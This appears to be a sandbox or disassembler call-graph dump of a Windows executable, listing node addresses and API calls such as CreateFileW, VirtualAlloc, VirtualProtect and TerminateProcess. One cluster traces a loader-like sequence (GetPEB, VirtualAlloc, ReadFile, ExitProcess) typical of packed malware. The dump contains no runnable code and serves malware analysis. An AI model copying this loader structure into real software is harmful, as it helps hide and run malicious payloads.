97123 7009b 97179 5f2d9 20 API calls _free 97123->97179 97124->97123 97126 700d4 97124->97126 97133 7065b 97126->97133 97127 700a0 97180 627ec 26 API calls ___std_exception_copy 97127->97180 97132 700aa __fread_nolock 97132->97116 97134 70678 97133->97134 97135 706a6 97134->97135 97136 7068d 97134->97136 97182 65221 97135->97182 97196 5f2c6 20 API calls _free 97136->97196 97139 706ab 97140 706b4 97139->97140 97141 706cb 97139->97141 97198 5f2c6 20 API calls _free 97140->97198 97195 7039a CreateFileW 97141->97195 97145 700f8 97181 70121 LeaveCriticalSection __wsopen_s 97145->97181 97146 706b9 97199 5f2d9 20 API calls _free 97146->97199 97148 70781 GetFileType 97149 707d3 97148->97149 97150 7078c GetLastError 97148->97150 97204 6516a 21 API calls 3 library calls 97149->97204 97202 5f2a3 20 API calls 2 library calls 97150->97202 97151 70692 97197 5f2d9 20 API calls _free 97151->97197 97152 70756 GetLastError 97201 5f2a3 20 API calls 2 library calls 97152->97201 97155 70704 97155->97148 97155->97152 97200 7039a CreateFileW 97155->97200 97157 7079a CloseHandle 97157->97151 97160 707c3 97157->97160 97158 70749 97158->97148 97158->97152 97203 5f2d9 20 API calls _free 97160->97203 97161 707f4 97163 70840 97161->97163 97205 705ab 72 API calls 4 library calls 97161->97205 97168 7086d 97163->97168 97206 7014d 72 API calls 4 library calls 97163->97206 97164 707c8 97164->97151 97167 70866 97167->97168 97169 7087e 97167->97169 97170 686ae __wsopen_s 29 API calls 97168->97170 97169->97145 97171 708fc CloseHandle 97169->97171 97170->97145 97207 7039a CreateFileW 97171->97207 97173 70927 97174 7095d 97173->97174 97175 70931 GetLastError 97173->97175 97174->97145 97208 5f2a3 20 API calls 2 library calls 97175->97208 97177 7093d 97209 65333 21 API calls 3 library calls 97177->97209 97179->97127 97180->97132 97181->97132 97183 6522d ___BuildCatchObject 97182->97183 97210 62f5e EnterCriticalSection 97183->97210 97185 65234 97187 65259 97185->97187 97191 652c7 EnterCriticalSection 97185->97191 97194 6527b 97185->97194 97214 65000 21 API calls 3 library calls 97187->97214 97189 652a4 __fread_nolock 97189->97139 97190 6525e 97190->97194 97215 65147 EnterCriticalSection 97190->97215 97193 652d4 LeaveCriticalSection 97191->97193 97191->97194 97193->97185 97211 6532a 97194->97211 97195->97155 97196->97151 97197->97145 97198->97146 97199->97151 97200->97158 97201->97151 97202->97157 97203->97164 97204->97161 97205->97163 97206->97167 97207->97173 97208->97177 97209->97174 97210->97185 97216 62fa6 LeaveCriticalSection 97211->97216 97213 65331 97213->97189 97214->97190 97215->97194 97216->97213 97217 3dee5 97220 3b710 97217->97220 97221 3b72b 97220->97221 97222 800f8 97221->97222 97223 80146 97221->97223 97245 3b750 97221->97245 97226 80102 97222->97226 97229 8010f 97222->97229 97222->97245 97262 b58a2 207 API calls 2 library calls 97223->97262 97260 b5d33 207 API calls 97226->97260 97241 3ba20 97229->97241 97261 b61d0 207 API calls 2 library calls 97229->97261 97232 803d9 97232->97232 97236 3ba4e 97237 80322 97265 b5c0c 82 API calls 97237->97265 97241->97236 97266 a359c 82 API calls __wsopen_s 97241->97266 97244 3aceb 23 API calls 97244->97245 97245->97236 97245->97237 97245->97241 97245->97244 97246 3bbe0 40 API calls 97245->97246 97247 4d336 40 API calls 97245->97247 97248 3ec40 207 API calls 97245->97248 97251 3a81b 41 API calls 97245->97251 97252 4d2f0 40 API calls 97245->97252 97253 4a01b 207 API calls 97245->97253 97254 50242 5 API calls __Init_thread_wait 97245->97254 97255 4edcd 22 API calls 97245->97255 97256 500a3 29 API calls __onexit 97245->97256 97257 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97245->97257 97258 4ee53 82 API calls 97245->97258 97259 4e5ca 207 API calls 97245->97259 97263 8f6bf 23 API calls 97245->97263 97264 3a8c7 22 API calls __fread_nolock 97245->97264 97246->97245 97247->97245 97248->97245 97251->97245 97252->97245 97253->97245 97254->97245 97255->97245 97256->97245 97257->97245 97258->97245 97259->97245 97260->97229 97261->97241 97262->97245 97263->97245 97264->97245 97265->97241 97266->97232 97267 31044 97272 310f3 97267->97272 97269 3104a 97308 500a3 29 API calls __onexit 97269->97308 97271 31054 97309 31398 97272->97309 97276 3116a 97277 3a961 22 API calls 97276->97277 97278 31174 97277->97278 97279 3a961 22 API calls 97278->97279 97280 3117e 97279->97280 97281 3a961 22 API calls 97280->97281 97282 31188 97281->97282 97283 3a961 22 API calls 97282->97283 97284 311c6 97283->97284 97285 3a961 22 API calls 97284->97285 97286 31292 97285->97286 97319 3171c 97286->97319 97290 312c4 97291 3a961 22 API calls 97290->97291 97292 312ce 97291->97292 97340 41940 97292->97340 97294 312f9 97350 31aab 97294->97350 97296 31315 97297 31325 GetStdHandle 97296->97297 97298 72485 97297->97298 97299 3137a 97297->97299 97298->97299 97300 7248e 97298->97300 97302 31387 OleInitialize 97299->97302 97301 4fddb 22 API calls 97300->97301 97303 72495 97301->97303 97302->97269 97357 a011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97303->97357 97305 7249e 97358 a0944 CreateThread 97305->97358 97307 724aa CloseHandle 97307->97299 97308->97271 97359 313f1 97309->97359 97312 313f1 22 API calls 97313 313d0 97312->97313 97314 3a961 22 API calls 97313->97314 97315 313dc 97314->97315 97316 36b57 22 API calls 97315->97316 97317 31129 97316->97317 97318 31bc3 6 API calls 97317->97318 97318->97276 97320 3a961 22 API calls 97319->97320 97321 3172c 97320->97321 97322 3a961 22 API calls 97321->97322 97323 31734 97322->97323 97324 3a961 22 API calls 97323->97324 97325 3174f 97324->97325 97326 4fddb 22 API calls 97325->97326 97327 3129c 97326->97327 97328 31b4a 97327->97328 97329 31b58 97328->97329 97330 3a961 22 API calls 97329->97330 97331 31b63 97330->97331 97332 3a961 22 API calls 97331->97332 97333 31b6e 97332->97333 97334 3a961 22 API calls 97333->97334 97335 31b79 97334->97335 97336 3a961 22 API calls 97335->97336 97337 31b84 97336->97337 97338 4fddb 22 API calls 97337->97338 97339 31b96 RegisterWindowMessageW 97338->97339 97339->97290 97341 41981 97340->97341 97342 4195d 97340->97342 97366 50242 5 API calls __Init_thread_wait 97341->97366 97349 4196e 97342->97349 97368 50242 5 API calls __Init_thread_wait 97342->97368 97345 4198b 97345->97342 97367 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97345->97367 97346 48727 97346->97349 97369 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97346->97369 97349->97294 97351 31abb 97350->97351 97352 7272d 97350->97352 97353 4fddb 22 API calls 97351->97353 97370 a3209 23 API calls 97352->97370 97356 31ac3 97353->97356 97355 72738 97356->97296 97357->97305 97358->97307 97371 a092a 28 API calls 97358->97371 97360 3a961 22 API calls 97359->97360 97361 313fc 97360->97361 97362 3a961 22 API calls 97361->97362 97363 31404 97362->97363 97364 3a961 22 API calls 97363->97364 97365 313c6 97364->97365 97365->97312 97366->97345 97367->97342 97368->97346 97369->97349 97370->97355 97372 82a00 97373 3d7b0 messages 97372->97373 97374 3db11 PeekMessageW 97373->97374 97375 3d807 GetInputState 97373->97375 97376 3d9d5 97373->97376 97378 81cbe TranslateAcceleratorW 97373->97378 97379 3db8f PeekMessageW 97373->97379 97380 3da04 timeGetTime 97373->97380 97381 3db73 TranslateMessage DispatchMessageW 97373->97381 97382 3dbaf Sleep 97373->97382 97383 82b74 Sleep 97373->97383 97385 81dda timeGetTime 97373->97385 97399 3ec40 207 API calls 97373->97399 97404 3dd50 97373->97404 97411 3dfd0 97373->97411 97434 41310 97373->97434 97490 4edf6 97373->97490 97495 3bf40 97373->97495 97554 a3a2a 23 API calls 97373->97554 97555 a359c 82 API calls __wsopen_s 97373->97555 97374->97373 97375->97373 97375->97374 97378->97373 97379->97373 97380->97373 97381->97379 97402 3dbc0 97382->97402 97383->97402 97384 4e551 timeGetTime 97384->97402 97553 4e300 23 API calls 97385->97553 97388 82c0b GetExitCodeProcess 97389 82c21 WaitForSingleObject 97388->97389 97390 82c37 CloseHandle 97388->97390 97389->97373 97389->97390 97390->97402 97391 82a31 97391->97376 97392 c29bf GetForegroundWindow 97392->97402 97394 82ca9 Sleep 97394->97373 97399->97373 97402->97373 97402->97376 97402->97384 97402->97388 97402->97391 97402->97392 97402->97394 97556 b5658 23 API calls 97402->97556 97557 9e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97402->97557 97558 9d4dc 47 API calls 97402->97558 97405 3dd83 97404->97405 97406 3dd6f 97404->97406 97591 a359c 82 API calls __wsopen_s 97405->97591 97559 3d260 97406->97559 97408 3dd7a 97408->97373 97410 82f75 97410->97410 97412 3e010 97411->97412 97428 3e0dc messages 97412->97428 97602 50242 5 API calls __Init_thread_wait 97412->97602 97415 82fca 97417 3a961 22 API calls 97415->97417 97415->97428 97416 3a961 22 API calls 97416->97428 97418 82fe4 97417->97418 97603 500a3 29 API calls __onexit 97418->97603 97422 82fee 97604 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97422->97604 97425 3ec40 207 API calls 97425->97428 97428->97416 97428->97425 97429 3e3e1 97428->97429 97430 404f0 22 API calls 97428->97430 97431 a359c 82 API calls 97428->97431 97599 3a8c7 22 API calls __fread_nolock 97428->97599 97600 3a81b 41 API calls 97428->97600 97601 4a308 207 API calls 97428->97601 97605 50242 5 API calls __Init_thread_wait 97428->97605 97606 500a3 29 API calls __onexit 97428->97606 97607 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97428->97607 97608 b47d4 207 API calls 97428->97608 97609 b68c1 207 API calls 97428->97609 97429->97373 97430->97428 97431->97428 97435 41376 97434->97435 97436 417b0 97434->97436 97437 41390 97435->97437 97438 86331 97435->97438 97686 50242 5 API calls __Init_thread_wait 97436->97686 97440 41940 9 API calls 97437->97440 97441 8633d 97438->97441 97690 b709c 207 API calls 97438->97690 97444 413a0 97440->97444 97441->97373 97443 417ba 97445 417fb 97443->97445 97447 39cb3 22 API calls 97443->97447 97446 41940 9 API calls 97444->97446 97449 86346 97445->97449 97451 4182c 97445->97451 97448 413b6 97446->97448 97454 417d4 97447->97454 97448->97445 97450 413ec 97448->97450 97691 a359c 82 API calls __wsopen_s 97449->97691 97450->97449 97459 41408 __fread_nolock 97450->97459 97452 3aceb 23 API calls 97451->97452 97455 41839 97452->97455 97687 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97454->97687 97688 4d217 207 API calls 97455->97688 97458 8636e 97692 a359c 82 API calls __wsopen_s 97458->97692 97459->97455 97459->97458 97467 4fddb 22 API calls 97459->97467 97468 4fe0b 22 API calls 97459->97468 97473 3ec40 207 API calls 97459->97473 97474 4152f 97459->97474 97475 863b2 97459->97475 97478 86369 97459->97478 97461 41872 97689 4faeb 23 API calls 97461->97689 97462 4153c 97465 41940 9 API calls 97462->97465 97463 863d1 97694 b5745 54 API calls _wcslen 97463->97694 97466 41549 97465->97466 97470 41940 9 API calls 97466->97470 97471 864fa 97466->97471 97467->97459 97468->97459 97476 41563 97470->97476 97471->97478 97696 a359c 82 API calls __wsopen_s 97471->97696 97473->97459 97474->97462 97474->97463 97693 a359c 82 API calls __wsopen_s 97475->97693 97476->97471 97481 415c7 messages 97476->97481 97695 3a8c7 22 API calls __fread_nolock 97476->97695 97478->97373 97480 41940 9 API calls 97480->97481 97481->97461 97481->97471 97481->97478 97481->97480 97484 4167b messages 97481->97484 97610 a744a 97481->97610 97666 a83da 97481->97666 97669 af0ec 97481->97669 97678 36246 97481->97678 97682 b958b 97481->97682 97482 4171d 97482->97373 97484->97482 97685 4ce17 22 API calls messages 97484->97685 97492 4ee09 97490->97492 97493 4ee12 97490->97493 97491 4ee36 IsDialogMessageW 97491->97492 97491->97493 97492->97373 97493->97491 97493->97492 97494 8efaf GetClassLongW 97493->97494 97494->97491 97494->97493 97939 3adf0 97495->97939 97497 3bf9d 97498 3bfa9 97497->97498 97499 804b6 97497->97499 97501 804c6 97498->97501 97502 3c01e 97498->97502 97967 a359c 82 API calls __wsopen_s 97499->97967 97968 a359c 82 API calls __wsopen_s 97501->97968 97944 3ac91 97502->97944 97506 97120 22 API calls 97551 3c039 __fread_nolock messages 97506->97551 97507 3c7da 97510 4fe0b 22 API calls 97507->97510 97515 3c808 __fread_nolock 97510->97515 97512 804f5 97516 8055a 97512->97516 97969 4d217 207 API calls 97512->97969 97517 4fe0b 22 API calls 97515->97517 97536 3c603 97516->97536 97970 a359c 82 API calls __wsopen_s 97516->97970 97550 3c350 __fread_nolock messages 97517->97550 97518 3af8a 22 API calls 97518->97551 97519 8091a 97979 a3209 23 API calls 97519->97979 97522 3ec40 207 API calls 97522->97551 97523 808a5 97524 3ec40 207 API calls 97523->97524 97526 808cf 97524->97526 97526->97536 97977 3a81b 41 API calls 97526->97977 97527 80591 97971 a359c 82 API calls __wsopen_s 97527->97971 97528 808f6 97978 a359c 82 API calls __wsopen_s 97528->97978 97533 3aceb 23 API calls 97533->97551 97534 3c237 97535 3c253 97534->97535 97980 3a8c7 22 API calls __fread_nolock 97534->97980 97539 80976 97535->97539 97545 3c297 messages 97535->97545 97536->97373 97537 4fe0b 22 API calls 97537->97551 97541 3aceb 23 API calls 97539->97541 97543 809bf 97541->97543 97542 4fddb 22 API calls 97542->97551 97543->97536 97981 a359c 82 API calls __wsopen_s 97543->97981 97544 3aceb 23 API calls 97546 3c335 97544->97546 97545->97543 97545->97544 97546->97543 97547 3c342 97546->97547 97955 3a704 97547->97955 97548 3bbe0 40 API calls 97548->97551 97552 3c3ac 97550->97552 97966 4ce17 22 API calls messages 97550->97966 97551->97506 97551->97507 97551->97512 97551->97515 97551->97516 97551->97518 97551->97519 97551->97522 97551->97523 97551->97527 97551->97528 97551->97533 97551->97534 97551->97536 97551->97537 97551->97542 97551->97543 97551->97548 97948 3ad81 97551->97948 97972 97099 22 API calls __fread_nolock 97551->97972 97973 b5745 54 API calls _wcslen 97551->97973 97974 4aa42 22 API calls messages 97551->97974 97975 9f05c 40 API calls 97551->97975 97976 3a993 41 API calls 97551->97976 97552->97373 97553->97373 97554->97373 97555->97373 97556->97402 97557->97402 97558->97402 97560 3ec40 207 API calls 97559->97560 97577 3d29d 97560->97577 97561 81bc4 97598 a359c 82 API calls __wsopen_s 97561->97598 97563 3d30b messages 97563->97408 97564 3d6d5 97564->97563 97575 4fe0b 22 API calls 97564->97575 97565 3d3c3 97565->97564 97567 3d3ce 97565->97567 97566 3d5ff 97568 3d614 97566->97568 97569 81bb5 97566->97569 97571 4fddb 22 API calls 97567->97571 97572 4fddb 22 API calls 97568->97572 97597 b5705 23 API calls 97569->97597 97570 3d4b8 97576 4fe0b 22 API calls 97570->97576 97580 3d3d5 __fread_nolock 97571->97580 97585 3d46a 97572->97585 97574 4fddb 22 API calls 97574->97577 97575->97580 97582 3d429 __fread_nolock messages 97576->97582 97577->97561 97577->97563 97577->97564 97577->97565 97577->97570 97577->97574 97577->97582 97578 4fddb 22 API calls 97579 3d3f6 97578->97579 97579->97582 97592 3bec0 207 API calls 97579->97592 97580->97578 97580->97579 97582->97566 97583 81ba4 97582->97583 97582->97585 97587 81b7f 97582->97587 97589 81b5d 97582->97589 97593 31f6f 207 API calls 97582->97593 97596 a359c 82 API calls __wsopen_s 97583->97596 97585->97408 97595 a359c 82 API calls __wsopen_s 97587->97595 97594 a359c 82 API calls __wsopen_s 97589->97594 97591->97410 97592->97582 97593->97582 97594->97585 97595->97585 97596->97585 97597->97561 97598->97563 97599->97428 97600->97428 97601->97428 97602->97415 97603->97422 97604->97428 97605->97428 97606->97428 97607->97428 97608->97428 97609->97428 97611 a7469 97610->97611 97613 a7474 97610->97613 97728 3b567 39 API calls 97611->97728 97615 3a961 22 API calls 97613->97615 97653 a7554 97613->97653 97614 4fddb 22 API calls 97616 a7587 97614->97616 97617 a7495 97615->97617 97618 4fe0b 22 API calls 97616->97618 97619 3a961 22 API calls 97617->97619 97620 a7598 97618->97620 97621 a749e 97619->97621 97622 36246 CloseHandle 97620->97622 97624 37510 53 API calls 97621->97624 97623 a75a3 97622->97623 97625 3a961 22 API calls 97623->97625 97626 a74aa 97624->97626 97627 a75ab 97625->97627 97729 3525f 22 API calls 97626->97729 97629 36246 CloseHandle 97627->97629 97631 a75b2 97629->97631 97630 a74bf 97632 36350 22 API calls 97630->97632 97697 37510 97631->97697 97633 a74f2 97632->97633 97635 a754a 97633->97635 97730 9d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97633->97730 97732 3b567 39 API calls 97635->97732 97638 36246 CloseHandle 97641 a75c8 97638->97641 97640 a7502 97640->97635 97642 a7506 97640->97642 97720 35745 97641->97720 97643 39cb3 22 API calls 97642->97643 97645 a7513 97643->97645 97731 9d2c1 26 API calls 97645->97731 97648 a75ea 97733 353de 27 API calls messages 97648->97733 97649 a76de GetLastError 97650 a76f7 97649->97650 97740 36216 CloseHandle messages 97650->97740 97653->97614 97664 a76a4 97653->97664 97654 a75f8 97734 353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97654->97734 97655 a751c 97655->97635 97657 a7645 97658 4fddb 22 API calls 97657->97658 97660 a7679 97658->97660 97659 a75ff 97659->97657 97735 9ccff 97659->97735 97661 3a961 22 API calls 97660->97661 97663 a7686 97661->97663 97663->97664 97739 9417d 22 API calls __fread_nolock 97663->97739 97664->97481 97747 a98e3 97666->97747 97668 a83ea 97668->97481 97670 37510 53 API calls 97669->97670 97671 af126 97670->97671 97811 39e90 97671->97811 97673 af136 97674 af15b 97673->97674 97675 3ec40 207 API calls 97673->97675 97677 af15f 97674->97677 97839 39c6e 22 API calls 97674->97839 97675->97674 97677->97481 97679 36250 97678->97679 97680 3625f 97678->97680 97679->97481 97680->97679 97681 36264 CloseHandle 97680->97681 97681->97679 97847 b7f59 97682->97847 97684 b959b 97684->97481 97685->97484 97686->97443 97687->97445 97688->97461 97689->97461 97690->97441 97691->97478 97692->97478 97693->97478 97694->97476 97695->97481 97696->97478 97698 37522 97697->97698 97699 37525 97697->97699 97698->97638 97700 3755b 97699->97700 97701 3752d 97699->97701 97702 750f6 97700->97702 97705 3756d 97700->97705 97712 7500f 97700->97712 97741 551c6 26 API calls 97701->97741 97744 55183 26 API calls 97702->97744 97742 4fb21 51 API calls 97705->97742 97706 3753d 97709 4fddb 22 API calls 97706->97709 97707 7510e 97707->97707 97711 37547 97709->97711 97713 39cb3 22 API calls 97711->97713 97714 4fe0b 22 API calls 97712->97714 97716 75088 97712->97716 97713->97698 97715 75058 97714->97715 97717 4fddb 22 API calls 97715->97717 97743 4fb21 51 API calls 97716->97743 97718 7507f 97717->97718 97719 39cb3 22 API calls 97718->97719 97719->97716 97721 74035 97720->97721 97722 3575c CreateFileW 97720->97722 97723 3577b 97721->97723 97724 7403b CreateFileW 97721->97724 97722->97723 97723->97648 97723->97649 97724->97723 97725 74063 97724->97725 97745 354c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97725->97745 97727 7406e 97727->97723 97728->97613 97729->97630 97730->97640 97731->97655 97732->97653 97733->97654 97734->97659 97736 9cd19 WriteFile 97735->97736 97737 9cd0e 97735->97737 97736->97657 97746 9cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97737->97746 97739->97664 97740->97664 97741->97706 97742->97706 97743->97702 97744->97707 97745->97727 97746->97736 97748 a99e8 97747->97748 97749 a9902 97747->97749 97805 a9caa 39 API calls 97748->97805 97751 4fddb 22 API calls 97749->97751 97752 a9909 97751->97752 97753 4fe0b 22 API calls 97752->97753 97754 a991a 97753->97754 97757 36246 CloseHandle 97754->97757 97755 a99a2 97756 a9ac5 97755->97756 97758 a99ca 97755->97758 97764 a9a33 97755->97764 97798 a1e96 97756->97798 97760 a9925 97757->97760 97758->97668 97762 3a961 22 API calls 97760->97762 97761 a9acc 97768 9ccff 4 API calls 97761->97768 97763 a992d 97762->97763 97765 36246 CloseHandle 97763->97765 97766 37510 53 API calls 97764->97766 97767 a9934 97765->97767 97776 a9a3a 97766->97776 97769 37510 53 API calls 97767->97769 97792 a9aa8 97768->97792 97772 a9940 97769->97772 97770 a9abb 97808 9cd57 30 API calls 97770->97808 97774 36246 CloseHandle 97772->97774 97773 a9a6e 97775 36270 22 API calls 97773->97775 97778 a994a 97774->97778 97779 a9a7e 97775->97779 97776->97770 97776->97773 97777 36246 CloseHandle 97780 a9b1e 97777->97780 97781 35745 5 API calls 97778->97781 97782 a9a8e 97779->97782 97806 3a8c7 22 API calls __fread_nolock 97779->97806 97809 36216 CloseHandle messages 97780->97809 97784 a9959 97781->97784 97786 333c6 22 API calls 97782->97786 97787 a995d 97784->97787 97788 a99c2 97784->97788 97789 a9a9c 97786->97789 97802 353de 27 API calls messages 97787->97802 97804 36216 CloseHandle messages 97788->97804 97807 9cd57 30 API calls 97789->97807 97792->97758 97792->97777 97794 a996b 97803 353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97794->97803 97796 a9972 97796->97755 97797 9ccff 4 API calls 97796->97797 97797->97755 97799 a1e9f 97798->97799 97800 a1ea4 97798->97800 97810 a0f67 24 API calls __fread_nolock 97799->97810 97800->97761 97802->97794 97803->97796 97804->97758 97805->97755 97806->97782 97807->97792 97808->97792 97809->97758 97810->97800 97812 36270 22 API calls 97811->97812 97838 39eb5 97812->97838 97813 39fd2 97814 3a4a1 22 API calls 97813->97814 97815 39fec 97814->97815 97815->97673 97818 7f7c4 97845 996e2 84 API calls __wsopen_s 97818->97845 97819 7f699 97825 4fddb 22 API calls 97819->97825 97821 3a405 97821->97815 97846 996e2 84 API calls __wsopen_s 97821->97846 97824 3a6c3 22 API calls 97824->97838 97827 7f754 97825->97827 97826 7f7d2 97828 3a4a1 22 API calls 97826->97828 97830 4fe0b 22 API calls 97827->97830 97829 7f7e8 97828->97829 97829->97815 97831 3a12c __fread_nolock 97830->97831 97831->97818 97831->97821 97833 3a587 22 API calls 97833->97838 97834 3aec9 22 API calls 97836 3a0db CharUpperBuffW 97834->97836 97835 3a4a1 22 API calls 97835->97838 97841 3a673 22 API calls 97836->97841 97838->97813 97838->97818 97838->97819 97838->97821 97838->97824 97838->97831 97838->97833 97838->97834 97838->97835 97840 34573 41 API calls _wcslen 97838->97840 97842 348c8 23 API calls 97838->97842 97843 349bd 22 API calls __fread_nolock 97838->97843 97844 3a673 22 API calls 97838->97844 97839->97677 97840->97838 97841->97838 97842->97838 97843->97838 97844->97838 97845->97826 97846->97815 97848 37510 53 API calls 97847->97848 97849 b7f90 97848->97849 97852 b7fd5 messages 97849->97852 97885 b8cd3 97849->97885 97851 b844f 97925 b8ee4 60 API calls 97851->97925 97852->97684 97855 b845e 97856 b828f 97855->97856 97857 b846a 97855->97857 97898 b7e86 97856->97898 97857->97852 97858 37510 53 API calls 97873 b8049 97858->97873 97863 b82c8 97913 4fc70 97863->97913 97866 b82e8 97919 a359c 82 API calls __wsopen_s 97866->97919 97867 b8302 97920 363eb 22 API calls 97867->97920 97870 b82f3 GetCurrentProcess TerminateProcess 97870->97867 97871 b8281 97871->97851 97871->97856 97872 b8311 97921 36a50 22 API calls 97872->97921 97873->97852 97873->97858 97873->97871 97917 9417d 22 API calls __fread_nolock 97873->97917 97918 b851d 42 API calls _strftime 97873->97918 97875 b832a 97884 b8352 97875->97884 97922 404f0 22 API calls 97875->97922 97877 b84c5 97877->97852 97880 b84d9 FreeLibrary 97877->97880 97878 b8341 97923 b8b7b 75 API calls 97878->97923 97880->97852 97883 3aceb 23 API calls 97883->97884 97884->97877 97884->97883 97924 404f0 22 API calls 97884->97924 97926 b8b7b 75 API calls 97884->97926 97886 3aec9 22 API calls 97885->97886 97887 b8cee CharLowerBuffW 97886->97887 97927 98e54 97887->97927 97891 3a961 22 API calls 97892 b8d2a 97891->97892 97934 36d25 22 API calls __fread_nolock 97892->97934 97894 b8d3e 97895 393b2 22 API calls 97894->97895 97897 b8d48 _wcslen 97895->97897 97896 b8e5e _wcslen 97896->97873 97897->97896 97935 b851d 42 API calls _strftime 97897->97935 97899 b7ea1 97898->97899 97903 b7eec 97898->97903 97900 4fe0b 22 API calls 97899->97900 97901 b7ec3 97900->97901 97902 4fddb 22 API calls 97901->97902 97901->97903 97902->97901 97904 b9096 97903->97904 97905 b92ab messages 97904->97905 97906 b90ba _strcat _wcslen 97904->97906 97905->97863 97906->97905 97907 3b567 39 API calls 97906->97907 97908 3b38f 39 API calls 97906->97908 97909 3b6b5 39 API calls 97906->97909 97910 5ea0c 21 API calls ___std_exception_copy 97906->97910 97911 37510 53 API calls 97906->97911 97938 9efae 24 API calls _wcslen 97906->97938 97907->97906 97908->97906 97909->97906 97910->97906 97911->97906 97914 4fc85 97913->97914 97915 4fd1d VirtualProtect 97914->97915 97916 4fceb 97914->97916 97915->97916 97916->97866 97916->97867 97917->97873 97918->97873 97919->97870 97920->97872 97921->97875 97922->97878 97923->97884 97924->97884 97925->97855 97926->97884 97929 98e74 _wcslen 97927->97929 97928 98f63 97928->97891 97928->97897 97929->97928 97930 98f68 97929->97930 97932 98ea9 97929->97932 97930->97928 97937 4ce60 41 API calls 97930->97937 97932->97928 97936 4ce60 41 API calls 97932->97936 97934->97894 97935->97896 97936->97932 97937->97930 97938->97906 97940 3ae01 97939->97940 97943 3ae1c messages 97939->97943 97941 3aec9 22 API calls 97940->97941 97942 3ae09 CharUpperBuffW 97941->97942 97942->97943 97943->97497 97945 3acae 97944->97945 97946 3acd1 97945->97946 97982 a359c 82 API calls __wsopen_s 97945->97982 97946->97551 97949 3ad92 97948->97949 97950 7fadb 97948->97950 97951 4fddb 22 API calls 97949->97951 97952 3ad99 97951->97952 97983 3adcd 97952->97983 97956 7f86f 97955->97956 97959 3a718 97955->97959 97957 7f87f 97956->97957 98000 94d4a 22 API calls messages 97956->98000 97960 3a763 messages 97959->97960 97961 3a746 97959->97961 97962 3af8a 22 API calls 97959->97962 97960->97550 97963 3a74c 97961->97963 97991 3af8a 97961->97991 97962->97961 97963->97960 97999 3b090 22 API calls messages 97963->97999 97966->97550 97967->97501 97968->97536 97969->97516 97970->97536 97971->97536 97972->97551 97973->97551 97974->97551 97975->97551 97976->97551 97977->97528 97978->97536 97979->97534 97980->97535 97981->97536 97982->97946 97989 3addd 97983->97989 97984 3adb6 97984->97551 97985 4fddb 22 API calls 97985->97989 97986 3a961 22 API calls 97986->97989 97988 3adcd 22 API calls 97988->97989 97989->97984 97989->97985 97989->97986 97989->97988 97990 3a8c7 22 API calls __fread_nolock 97989->97990 97990->97989 97992 3af98 97991->97992 97998 3afc0 messages 97991->97998 97993 3afa6 97992->97993 97994 3af8a 22 API calls 97992->97994 97995 3afac 97993->97995 97996 3af8a 22 API calls 97993->97996 97994->97993 97995->97998 98001 3b090 22 API calls messages 97995->98001 97996->97995 97998->97963 97999->97960 98000->97957 98001->97998 98002 83a41 98006 a10c0 98002->98006 98004 83a4c 98005 a10c0 53 API calls 98004->98005 98005->98004 98007 a10fa 98006->98007 98012 a10cd 98006->98012 98007->98004 98008 a10fc 98018 4fa11 53 API calls 98008->98018 98010 a1101 98011 37510 53 API calls 98010->98011 98013 a1108 98011->98013 98012->98007 98012->98008 98012->98010 98015 a10f4 98012->98015 98014 36350 22 API calls 98013->98014 98014->98007 98017 3b270 39 API calls 98015->98017 98017->98007 98018->98010 98019 31cad SystemParametersInfoW 98020 1b64cf8 98034 1b62948 98020->98034 98022 1b64d93 98037 1b64be8 98022->98037 98024 1b64dbc CreateFileW 98026 1b64e10 98024->98026 98027 1b64e0b 98024->98027 98026->98027 98028 1b64e27 VirtualAlloc 98026->98028 98028->98027 98029 1b64e45 ReadFile 98028->98029 98029->98027 98030 1b64e60 98029->98030 98031 1b63be8 13 API calls 98030->98031 98032 1b64e93 98031->98032 98033 1b64eb6 ExitProcess 98032->98033 98033->98027 98036 1b62fd3 98034->98036 98040 1b65db8 GetPEB 98034->98040 98036->98022 98038 1b64bf1 Sleep 98037->98038 98039 1b64bff 98038->98039 98040->98036 98041 31033 98046 34c91 98041->98046 98045 31042 98047 3a961 22 API calls 98046->98047 98048 34cff 98047->98048 98054 33af0 98048->98054 98051 34d9c 98052 31038 98051->98052 98057 351f7 22 API calls __fread_nolock 98051->98057 98053 500a3 29 API calls __onexit 98052->98053 98053->98045 98058 33b1c 98054->98058 98057->98051 98059 33b0f 98058->98059 98060 33b29 98058->98060 98059->98051 98060->98059 98061 33b30 RegOpenKeyExW 98060->98061 98061->98059 98062 33b4a RegQueryValueExW 98061->98062 98063 33b80 RegCloseKey 98062->98063 98064 33b6b 98062->98064 98063->98059 98064->98063 98065 32e37 98066 3a961 22 API calls 98065->98066 98067 32e4d 98066->98067 98144 34ae3 98067->98144 98069 32e6b 98070 33a5a 24 API calls 98069->98070 98071 32e7f 98070->98071 98072 39cb3 22 API calls 98071->98072 98073 32e8c 98072->98073 98074 34ecb 94 API calls 98073->98074 98075 32ea5 98074->98075 98076 72cb0 98075->98076 98077 32ead 98075->98077 98078 a2cf9 80 API calls 98076->98078 98158 3a8c7 22 API calls __fread_nolock 98077->98158 98079 72cc3 98078->98079 98080 72ccf 98079->98080 98082 34f39 68 API calls 98079->98082 98085 34f39 68 API calls 98080->98085 98082->98080 98083 32ec3 98159 36f88 22 API calls 98083->98159 98087 72ce5 98085->98087 98086 32ecf 98088 39cb3 22 API calls 98086->98088 98176 33084 22 API calls 98087->98176 98089 32edc 98088->98089 98160 3a81b 41 API calls 98089->98160 98091 32eec 98094 39cb3 22 API calls 98091->98094 98093 72d02 98177 33084 22 API calls 98093->98177 98096 32f12 98094->98096 98161 3a81b 41 API calls 98096->98161 98097 72d1e 98099 33a5a 24 API calls 98097->98099 98100 72d44 98099->98100 98178 33084 22 API calls 98100->98178 